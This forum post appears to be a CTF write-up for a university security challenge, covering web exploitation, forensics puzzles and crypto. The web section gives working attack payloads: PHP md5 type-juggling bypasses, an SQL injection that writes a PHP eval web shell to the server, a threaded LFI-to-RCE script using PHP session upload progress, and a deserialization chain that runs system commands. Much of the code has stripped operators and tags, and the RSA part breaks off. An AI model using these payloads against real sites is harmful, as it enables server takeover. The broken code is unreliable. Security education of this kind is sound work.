Jump to content

Title: Hebei Normal University Information Security Challenge - Preliminary Writup

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

WEB

mmmmd5d5d5d5

Link Open Page

image

Bypass

?a[]=1b[]=2

image

Construct md5

?php

for($i=0 ; $i=100000 ; $i ++)

{

if (substr(md5($i) , 5, 5)==='3ddc6')

{

echo $i;

break;

}

}

?

Enter the next level

image

submit

ffiffdyop

get:

?php

error_reporting(0);

include 'flag.php';

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']md5($_POST['param1'])===md5($_POST['param2'])){

echo $flag;

}

image

Construct the payload:

param1[]=1param2[]=2

You can get flag

EDGnb(Sign-in)

Open directly docker desktop version

image

You can get flag

The treasure of the time tower

Link opens a login box

image

Construct the payload:

pswd=adminusname=admin' union select 1,'?php eval($_POST[1]);' into outfile '/var/www/html/1203.php';#

image

Ant Sword Connect 1203.php, password is 1, you can get flag

image

LFI_to_RCE

?php

show_source('./index.php');

include $_GET['file'];

?

Warning: include(): Filename cannot be empty in /var/www/html/index.php on line 3

Warning: include(): Failed opening '' for inclusion (include_path='./usr/local/lib/php') in /var/www/html/index.php on line 3

Posted on exp:

import requests

import io

import threading

url='http://81.70.102.209:10040/index.php'

sessid='21r000'

def write(session):

filebytes=io.BytesIO(b'a' * 1024 * 50)

while True:

res=session.post(url,

data={

'PHP_SESSION_UPLOAD_PROGRESS': '?php eval($_POST[1]);'

},

Cookies={

'PHPSESSID': sessid

},

files={

'file': ('21r000.jpg', filebytes)

}

)

def read(session):

while True:

res=session.post(url+'?file=/tmp/sess_'+sessid,

data={

'1':'system('ls /');'

},

Cookies={

'PHPSESSID':sessid

}

)

if 'etc' in res.text:

print(res.text)

if __name__=='__main__':

evnet=threading.Event()

with requests.session() as session:

for i in range(5):

threading.Thread(target=write, args=(session,)).start()

for i in range(5):

threading.Thread(target=read, args=(session,)).start()

evnet.set()

image

Visit to get flag

unserialize

?php

error_reporting(0);

include 'hint.php';

class x{

public $value;

public $cc;

function __wakeup(){

die('fighting!');

}

}

class a {

public $nice;

public function __destruct()

{

$this-nice=unserialize($this-nice);

$this-nice-value=$fake;

if($this-nice-value===$this-nice-cc)

$this-test-good();

}

}

class b {

public $value;

public $array;

public function good(){

if(is_array($this-array)){

($this-array)($this-value);

}

else{

echo 'must_array';

}

}

}

class c {

public $value;

public function shell($func) {

if(preg_match('/^[a-z0-9]*$/isD',$func)){

die('y0u_A2e_HacKK!');

}

else{

$func($this-value);

}

}

}

if (isset($_GET['pop'])) {

$pop=base64_decode($_GET['pop']);

unserialize($pop);

} else {

highlight_file(__FILE__);

}

The pop chain problem changes a:2 to a:3

?pop=TzoxOiJhIjozOntzOjQ6Im5pY2UiO3M6Mzc6Ik86MToieCI6Mjp7czo1OiJ2YWx1ZSI7TjtzOjI6ImNjIjtOO30iO3M6NDoidGVzdCI7TzoxOiJiIjoyOntzOjU6InZ hbHVlIjtzOjc6IlxzeXN0ZW0iO3M6NToiYXJyYXkiO2E6Mjp7aTowO086MToiYyI6MTp7czo1OiJ2YWx1ZSI7czo5OiJjYXQgL2ZsYWciO31pOjE7czo1OiJzaGVsbCI7fX19

Post pac

?php

class x{

public $value;

public $cc;

public function __construct()

{

$this-value=$fake;

$this-cc=$fake;

}

function __wakeup(){

die('fighting!');

}

}

class a {

public $nice;

public function __construct()

{

$this-nice=serialize(new x());

$this-test=new b();

}

public function __destruct()

{

$this-nice=unserialize($this-nice);

$this-nice-value=$fake;

if($this-nice-value===$this-nice-cc)

$this-test-good();

}

}

class b {

public $value='\system';

public $array ;

public function __construct()

{

$this-array=[new c(), 'shell'];

}

public function good(){

if(is_array($this-array)){

($this-array)($this-value);

}

else{

echo 'must_array';

}

}

}

class c {

public $value='cat /flag';

public function shell($func) {

if(preg_match('/^[a-z0-9]*$/isD',$func)){

die('y0u_A2e_HacKK!');

}

else{

$func($this-value);

}

}

}

$a=new a();

echo serialize($a);

echo 'br';

echo base64_encode(serialize($a));

?

misc

Come to the official account ya

image

Just scan the code

JamesHarden

Download and decompress the attachment and modify the file suffix. After adding .zip, the decompressed file is a .class file:

image

Rot13 decryption of URPGS{Jr1p0zr_G0_U3pg6_!} to obtain flag:

image

Hide and seek

Attachment opens the file as a word document

image

According to the text prompt, change the font size of the composition content to 12

Discovered as jsfuck encryption

image

http://codetab.com/JsUnFuck online website decrypted

Decrypt the flag

image

Lost Dog

Attachment opens

image

Open the lost dog folder

image

There is an image in the compressed package, but the password is required

Use brute force cracking in ziperello, set character set to number

image

image

The password is 142345, and the file is successfully decompressed to get a picture

image

Analyze file content using binwalk in kali

image

I found that there is a jpg file hidden in the hidden picture

Use foremost to detach files

image

The second image shows flag

image

snake

I got a tip when I reached 6000 points

image

Trace the source code

image

Remodel the show_text function

image

image

After pyinstaller is depackaged, there is a snake.pyc. After pyc decompiling it into py, it is its source code.

image

image

Get flag:

image

Questions

Just sign and return, and continue next time.

crypto

Sign in

Attachment opens

image

Deciphering the Buddhist Zen Treatise on Zen to obtain a string of base64 cipher texts

SkJDVUdWQ0dQTlRXNjMzRUw1V0hLWTNMTDVURzY0UzdQRlhYSzdJPQ==

After decryption, base32 decryption to get flag:

image

RSA_e_n

Attachment:

image

Decrypt e, n, c in rsa, and directly enter the script:

import gmpy2

import RSAwienerHacker

e=0x14b367bf01efd4dc667b8e62975479c612c96e78f7f1f55242b2973c882ddcb33a65c52174d8ae1273764ce429054ea3f2fdc38ff205443c92ef4198739f05a a11fc10d3fc6ff30c8f5f05a04f43e3d8fc9bfffe916b2e0360560a162729e91b7775bda70177e0f875626e0a81bd4eacea9948b02232a82659f8d9aa9b4c754f

n=0x75be564267f8bf6c2038dd0cadfeecbc3158acfc27e679dd0bdb0db0e90bd5198a0a7edc0626f357a2d75f3c37ede045b7f7ca6bda79e5bf6fc0aea0aa7beda587388599d2b77b538fc3e6666784493ffaf731e2ae232e8e9e9f9f2a4df25c19b7680f5bf6c485bd87923f01c17d8ec35438772c28e361774e6e7681d67ecbe19

c=1012765995653341910858965697656721116652720518377308814754312270523080954855033627158404996938070951204

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.